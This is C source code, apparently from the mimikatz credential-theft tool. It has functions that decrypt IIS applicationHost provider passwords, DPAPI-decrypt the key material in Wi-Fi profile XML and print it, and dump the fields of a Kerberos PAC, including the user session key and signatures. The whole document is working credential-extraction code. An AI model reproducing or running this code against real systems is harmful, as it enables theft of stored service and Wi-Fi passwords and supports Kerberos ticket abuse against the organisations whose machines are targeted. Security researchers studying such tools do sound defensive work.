void kuhl_m_iis_apphost_provider_decrypt(int argc, wchar_t * argv[], PCWSTR keyContainerName, BOOL isMachine, LPCBYTE sessionKey, DWORD szSessionKey, LPCBYTE data, DWORD szData) { BOOL isLive; PBYTE liveData; DWORD szLiveData, szPvk; HCRYPTPROV hProv; HCRYPTKEY hKey = 0, hSessionKey; PPVK_FILE_HDR pvk = NULL; PCWSTR pvkName = NULL; isLive = kull_m_string_args_byName(argc, argv, L"live", NULL, NULL); if(!kull_m_string_args_byName(argc, argv, keyContainerName, &pvkName, NULL)) kull_m_string_args_byName(argc, argv, L"pvk", &pvkName, NULL); if(isLive || pvkName) { if(liveData = (PBYTE) LocalAlloc(LPTR, szData)) { RtlCopyMemory(liveData, data, szData); szLiveData = szData; if(isLive) kprintf(L" | Live Key : %s - %s : ", keyContainerName, isMachine ? L"machine" : L"user"); if(CryptAcquireContext(&hProv, isLive ? keyContainerName : NULL, (MIMIKATZ_NT_BUILD_NUMBER <= KULL_M_WIN_BUILD_XP) ? MS_ENH_RSA_AES_PROV_XP : MS_ENH_RSA_AES_PROV , PROV_RSA_AES, (isLive ? 0 : CRYPT_VERIFYCONTEXT) | (isMachine ? CRYPT_MACHINE_KEYSET : 0))) { if(isLive) kprintf(L"OK\n"); else { if(kull_m_file_readData(pvkName, (PBYTE *) &pvk, &szPvk)) { kprintf(L" | PVK file : %s - \'%s\' : ", keyContainerName, pvkName); if(CryptImportKey(hProv, (PBYTE) pvk + sizeof(PVK_FILE_HDR), pvk->cbPvk, 0, 0, &hKey)) kprintf(L"OK\n"); else PRINT_ERROR_AUTO(L"CryptImportKey (RSA)"); } } if(isLive || hKey) { if(CryptImportKey(hProv, sessionKey, szSessionKey, hKey, 0, &hSessionKey)) { if(CryptDecrypt(hSessionKey, 0, FALSE, 0, liveData, &szLiveData)) { kprintf(L" | Password : %s\n", liveData + sizeof(DWORD) /*CRC32 ? Random ?*/); } else PRINT_ERROR_AUTO(L"CryptDecrypt"); CryptDestroyKey(hSessionKey); } else PRINT_ERROR_AUTO(L"CryptImportKey (session)"); } if(!isLive) { if(hKey) CryptDestroyKey(hKey); if(pvk) LocalFree(pvk); } CryptReleaseContext(hProv, 0); } else PRINT_ERROR_AUTO(L"CryptAcquireContext"); LocalFree(liveData); } } }
NTSTATUS kuhl_m_dpapi_wifi(int argc, wchar_t * argv[]) { PBYTE pFile, hex, dataOut; DWORD dwData, lenHex, lenDataOut; LPWSTR dataU, dataSSID, dataF, dataAuth; LPCWSTR infile; PKULL_M_DPAPI_BLOB blob; if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL)) { if(kull_m_file_readData(infile, &pFile, &dwData)) { if(dataU = kull_m_string_qad_ansi_to_unicode((const char *) pFile)) { if(kull_m_string_quickxml_simplefind(dataU, L"name", &dataF)) { kprintf(L"Profile \'%s\'\n\n", dataF); LocalFree(dataF); } if(kull_m_string_quickxml_simplefind(dataU, L"SSID", &dataSSID)) { kprintf(L" * SSID "); if(kull_m_string_quickxml_simplefind(dataSSID, L"name", &dataF)) { kprintf(L"name : %s\n", dataF); LocalFree(dataF); } else if(kull_m_string_quickxml_simplefind(dataSSID, L"hex", &dataF)) { kprintf(L"hex : %s\n", dataF); LocalFree(dataF); } else kprintf(L"?\n"); LocalFree(dataSSID); } if(kull_m_string_quickxml_simplefind(dataU, L"authentication", &dataAuth)) { kprintf(L" * Authentication: %s\n", dataAuth); if(kull_m_string_quickxml_simplefind(dataU, L"encryption", &dataF)) { kprintf(L" * Encryption : %s\n", dataF); LocalFree(dataF); } if(kull_m_string_quickxml_simplefind(dataU, L"keyMaterial", &dataF)) { if(kull_m_string_stringToHexBuffer(dataF, &hex, &lenHex)) { if(blob = kull_m_dpapi_blob_create(hex)) { kprintf(L"\n"); kull_m_dpapi_blob_descr(0, blob); if(kuhl_m_dpapi_unprotect_raw_or_blob(hex, lenHex, NULL, argc, argv, NULL, 0, (LPVOID *) &dataOut, &lenDataOut, NULL)) { kprintf(L" * Key Material : "); if(_wcsicmp(dataAuth, L"WEP") == 0) { kprintf(L"(hex) "); kull_m_string_wprintf_hex(dataOut, lenDataOut, 0); } else kprintf(L"%.*S", lenDataOut, dataOut); kprintf(L"\n"); LocalFree(dataOut); } kull_m_dpapi_blob_delete(blob); } LocalFree(hex); } LocalFree(dataF); } LocalFree(dataAuth); } LocalFree(dataU); } LocalFree(pFile); } else PRINT_ERROR_AUTO(L"kull_m_file_readData"); } else PRINT_ERROR(L"Input Wlan XML profile needed (/in:file)\n"); return STATUS_SUCCESS; }
NTSTATUS kuhl_m_kerberos_pac_info(int argc, wchar_t * argv[]) { PPACTYPE pacType; DWORD pacLenght, i, j; BYTE buffer[16] = {0}; PRPCE_KERB_VALIDATION_INFO pValInfo; PPAC_SIGNATURE_DATA pSignatureData; PPAC_CLIENT_INFO pClientInfo; PGROUP_MEMBERSHIP pGroup; PRPCE_KERB_EXTRA_SID pExtraSids; PSID pSid; PVOID base; if(kull_m_file_readData(L"C:\\security\\mimikatz\\mimikatz\\bad.pac", (PBYTE *) &pacType, &pacLenght)) { kprintf(L"version %u, nbBuffer = %u\n\n", pacType->Version, pacType->cBuffers); for(i = 0; i < pacType->cBuffers; i++) { switch(pacType->Buffers[i].ulType) { case PACINFO_TYPE_LOGON_INFO: pValInfo = (PRPCE_KERB_VALIDATION_INFO) ((PBYTE) pacType + pacType->Buffers[i].Offset); base = (PBYTE) &pValInfo->infos + sizeof(MARSHALL_KERB_VALIDATION_INFO); kprintf(L"[%02u] %08x @ offset %016llx (%u)\n", i, pacType->Buffers[i].ulType, pacType->Buffers[i].Offset, pacType->Buffers[i].cbBufferSize); kull_m_string_wprintf_hex((PBYTE) pacType + pacType->Buffers[i].Offset, pacType->Buffers[i].cbBufferSize, 1 | (16 << 16)); kprintf(L"\n"); kprintf(L"*** Validation Informations *** (%u)\n", pacType->Buffers[i].cbBufferSize); kprintf(L"TypeHeader : version 0x%02x, endianness 0x%02x, length %hu (%u), filer %08x\n", pValInfo->typeHeader.Version, pValInfo->typeHeader.Endianness, pValInfo->typeHeader.CommonHeaderLength, sizeof(MARSHALL_KERB_VALIDATION_INFO), pValInfo->typeHeader.Filler); kprintf(L"PrivateHeader : length %u, filer %08x\n", pValInfo->privateHeader.ObjectBufferLength, pValInfo->privateHeader.Filler); kprintf(L"RootElementId : %08x\n\n", pValInfo->RootElementId); kprintf(L"LogonTime %016llx - ", pValInfo->infos.LogonTime); kull_m_string_displayLocalFileTime(&pValInfo->infos.LogonTime); kprintf(L"\n"); kprintf(L"LogoffTime %016llx - ", pValInfo->infos.LogoffTime); kull_m_string_displayLocalFileTime(&pValInfo->infos.LogoffTime); kprintf(L"\n"); kprintf(L"KickOffTime %016llx - ", pValInfo->infos.KickOffTime); kull_m_string_displayLocalFileTime(&pValInfo->infos.KickOffTime); kprintf(L"\n"); kprintf(L"PasswordLastSet %016llx - ", pValInfo->infos.PasswordLastSet); kull_m_string_displayLocalFileTime(&pValInfo->infos.PasswordLastSet); kprintf(L"\n"); kprintf(L"PasswordCanChange %016llx - ", pValInfo->infos.PasswordCanChange); kull_m_string_displayLocalFileTime(&pValInfo->infos.PasswordCanChange); kprintf(L"\n"); kprintf(L"PasswordMustChange %016llx - ", pValInfo->infos.PasswordMustChange); kull_m_string_displayLocalFileTime(&pValInfo->infos.PasswordMustChange); kprintf(L"\n"); kprintf(L"\n"); kuhl_m_kerberos_pac_ustring(L"EffectiveName ", &pValInfo->infos.EffectiveName, base); kuhl_m_kerberos_pac_ustring(L"FullName ", &pValInfo->infos.FullName, base); kuhl_m_kerberos_pac_ustring(L"LogonScript ", &pValInfo->infos.LogonScript, base); kuhl_m_kerberos_pac_ustring(L"ProfilePath ", &pValInfo->infos.ProfilePath, base); kuhl_m_kerberos_pac_ustring(L"HomeDirectory ", &pValInfo->infos.HomeDirectory, base); kuhl_m_kerberos_pac_ustring(L"HomeDirectoryDrive ", &pValInfo->infos.HomeDirectoryDrive, base); kprintf(L"\n"); kprintf(L"LogonCount %hu\n", pValInfo->infos.LogonCount); kprintf(L"BadPasswordCount %hu\n", pValInfo->infos.BadPasswordCount); kprintf(L"\n"); kprintf(L"UserId %08x (%u)\n", pValInfo->infos.UserId, pValInfo->infos.UserId); kprintf(L"PrimaryGroupId %08x (%u)\n", pValInfo->infos.PrimaryGroupId, pValInfo->infos.PrimaryGroupId); kprintf(L"\n"); kprintf(L"GroupCount %u\n", pValInfo->infos.GroupCount); pGroup = (PGROUP_MEMBERSHIP) kuhl_m_kerberos_pac_giveElementById(pValInfo->infos.GroupIds, base); kprintf(L"GroupIds @ %08x\n * RID : ", pValInfo->infos.GroupIds); for(j = 0; j < pValInfo->infos.GroupCount; j++) kprintf(L"%u,", pGroup[j].RelativeId); //, pGroup[j].Attributes); kprintf(L"\n\n"); kprintf(L"UserFlags %08x (%u)\n", pValInfo->infos.UserFlags, pValInfo->infos.UserFlags); kprintf(L"UserSessionKey "); kull_m_string_wprintf_hex(pValInfo->infos.UserSessionKey.data, 16, 0); kprintf(L"\n"); kprintf(L"\n"); kuhl_m_kerberos_pac_ustring(L"LogonServer ", &pValInfo->infos.LogonServer, base); kuhl_m_kerberos_pac_ustring(L"LogonDomainName ", &pValInfo->infos.LogonDomainName, base); kprintf(L"\n"); pSid = (PSID) kuhl_m_kerberos_pac_giveElementById(pValInfo->infos.LogonDomainId, base); kprintf(L"LogonDomainId @ %08x\n * SID : ", pValInfo->infos.LogonDomainId); kull_m_string_displaySID(pSid); kprintf(L"\n"); kprintf(L"\n"); kprintf(L"UserAccountControl %08x (%u)\n", pValInfo->infos.UserAccountControl, pValInfo->infos.UserAccountControl); kprintf(L"SubAuthStatus %08x (%u)\n", pValInfo->infos.SubAuthStatus, pValInfo->infos.SubAuthStatus); kprintf(L"\n"); kprintf(L"LastSuccessfulILogon %016llx\n", pValInfo->infos.LastSuccessfulILogon); kprintf(L"LastFailedILogon %016llx\n", pValInfo->infos.LastFailedILogon); kprintf(L"\n"); kprintf(L"FailedILogonCount %u\n", pValInfo->infos.FailedILogonCount); kprintf(L"\n"); kprintf(L"SidCount %u\n", pValInfo->infos.SidCount); kprintf(L"ExtraSids @ %08x\n", pValInfo->infos.ExtraSids); pExtraSids = (PRPCE_KERB_EXTRA_SID) kuhl_m_kerberos_pac_giveElementById(pValInfo->infos.ExtraSids, base); for(j = 0; j < pValInfo->infos.SidCount; j++) {kull_m_string_wprintf_hex(pExtraSids, 64, 1); pSid = (PSID) kuhl_m_kerberos_pac_giveElementById(pExtraSids[j].ExtraSid, base); kprintf(L"ExtraSid [%u] @ %08x\n * SID : ", j, pExtraSids[j].ExtraSid); kull_m_string_displaySID(pSid); kprintf(L"\n"); } kprintf(L"\n"); pSid = (PSID) kuhl_m_kerberos_pac_giveElementById(pValInfo->infos.ResourceGroupDomainSid, base); kprintf(L"ResourceGroupDomainSid @ %08x\n * SID : ", pValInfo->infos.ResourceGroupDomainSid); if(pSid) kull_m_string_displaySID(pSid); kprintf(L"\n"); kprintf(L"ResourceGroupCount %u\n", pValInfo->infos.ResourceGroupCount); pGroup = (PGROUP_MEMBERSHIP) kuhl_m_kerberos_pac_giveElementById(pValInfo->infos.ResourceGroupIds, base); kprintf(L"ResourceGroupIds @ %08x\n * RID : ", pValInfo->infos.ResourceGroupIds); for(j = 0; j < pValInfo->infos.ResourceGroupCount; j++) kprintf(L"%u,", pGroup[j].RelativeId); //, pGroup[j].Attributes); break; case PACINFO_TYPE_CHECKSUM_SRV: // Server Signature case PACINFO_TYPE_CHECKSUM_KDC: // KDC Signature pSignatureData = (PPAC_SIGNATURE_DATA) ((PBYTE) pacType + pacType->Buffers[i].Offset); kprintf(L"*** %s Signature ***\n", (pacType->Buffers[i].ulType == 0x00000006) ? L"Server" : L"KDC"); kprintf(L"Type %08x - (%hu) : ", pSignatureData->SignatureType, 0);//pSignatureData->RODCIdentifier); kull_m_string_wprintf_hex(pSignatureData->Signature, (pSignatureData->SignatureType == KERB_CHECKSUM_HMAC_MD5) ? LM_NTLM_HASH_LENGTH : 12, 0); kprintf(L"\n"); break; case PACINFO_TYPE_CNAME_TINFO: // Client name and ticket information pClientInfo = (PPAC_CLIENT_INFO) ((PBYTE) pacType + pacType->Buffers[i].Offset); kprintf(L"*** Client name and ticket information ***\n"); kprintf(L"ClientId %016llx - ", pClientInfo->ClientId); kull_m_string_displayLocalFileTime(&pClientInfo->ClientId); kprintf(L"\n"); kprintf(L"Client (%hu, %.*s)\n", pClientInfo->NameLength, pClientInfo->NameLength / sizeof(WCHAR), pClientInfo->Name); break; default: kull_m_string_wprintf_hex(&pacType->Buffers[i], sizeof(PAC_INFO_BUFFER), 1); kprintf(L"\n"); kprintf(L"[%02u] %08x @ offset %016llx (%u)\n", i, pacType->Buffers[i].ulType, pacType->Buffers[i].Offset, pacType->Buffers[i].cbBufferSize); kull_m_string_wprintf_hex((PBYTE) pacType + pacType->Buffers[i].Offset, pacType->Buffers[i].cbBufferSize, 1); kprintf(L"\n"); } kprintf(L"\n"); } LocalFree(pacType); } return STATUS_SUCCESS; }